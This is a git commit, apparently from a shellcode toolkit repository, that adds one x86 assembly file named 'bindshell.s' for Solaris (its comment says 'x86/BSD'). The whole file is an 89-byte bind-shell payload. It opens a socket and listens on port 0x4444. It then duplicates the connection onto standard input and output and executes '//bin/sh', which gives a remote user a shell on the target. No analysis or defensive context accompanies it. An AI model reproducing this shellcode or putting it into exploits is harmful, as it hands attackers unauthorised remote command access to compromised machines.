From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001
From: Root THC
Date: Tue, 24 Feb 2026 12:42:47 +0000
Subject: initial

---
 other/shellkit/x86_solaris/bindshell.s | 68 ++++++++++++++++++++++++++++++++++
 1 file changed, 68 insertions(+)
 create mode 100644 other/shellkit/x86_solaris/bindshell.s

(limited to 'other/shellkit/x86_solaris/bindshell.s')

diff --git a/other/shellkit/x86_solaris/bindshell.s b/other/shellkit/x86_solaris/bindshell.s
new file mode 100644
index 0000000..1380747
--- /dev/null
+++ b/other/shellkit/x86_solaris/bindshell.s
@@ -0,0 +1,68 @@
+/* x86/BSD bindsh shellcode (89 bytes)
+   
+   lorian / teso
+*/
+
+	.globl  _cbegin
+	.globl	cbegin
+	.globl  _cend
+	.globl	cend
+
+_cbegin:
+cbegin:
+	movl	$0x3cfff8ff, %eax
+	notl	%eax
+	pushl	%eax
+	xorl	%ebx, %ebx
+	mull	%ebx
+	movb	$0x9a, %al
+	pushl	%eax
+	movl	%esp, %ecx
+	
+	pushl   %ebx
+	incl    %ebx
+	pushl   %ebx
+	incl	%ebx
+	pushl   %ebx
+	movb    $0xe6, %al
+	call	*%ecx
+
+	xchgl   %esi, %eax
+	pushl	%edx
+	pushw	$0x4444
+	pushw	%bx
+	movl	%esp, %ebp
+	pushl   $0x10
+	pushl	%ebp
+	pushl   %esi
+	xorl    %eax, %eax
+	movb    $0xe8, %al
+	call	*%ecx
+	movb	$0xe9, %al
+	call	*%ecx
+	pusha
+	popl    %edi
+	movb    $0xea, %al
+	call	*%ecx
+a:	
+	pushl	%ebx
+	pushl   %eax
+	movb	$0x3e, %al
+	call	*%ecx
+	decl	%ebx
+	jns	a
+	pushl	%edx
+	push    $0x68732F6E
+        push    $0x69622F2F
+	movl	%esp, %ebx
+	pushl	%edx
+	pushl	%ebx
+	movl	%esp, %edi
+	pushl	%edx
+	pushl	%edi
+	pushl	%ebx
+	movb	$0x3b, %al
+	call	*%ecx
+							
+_cend:
+cend:
-- 
cgit v1.3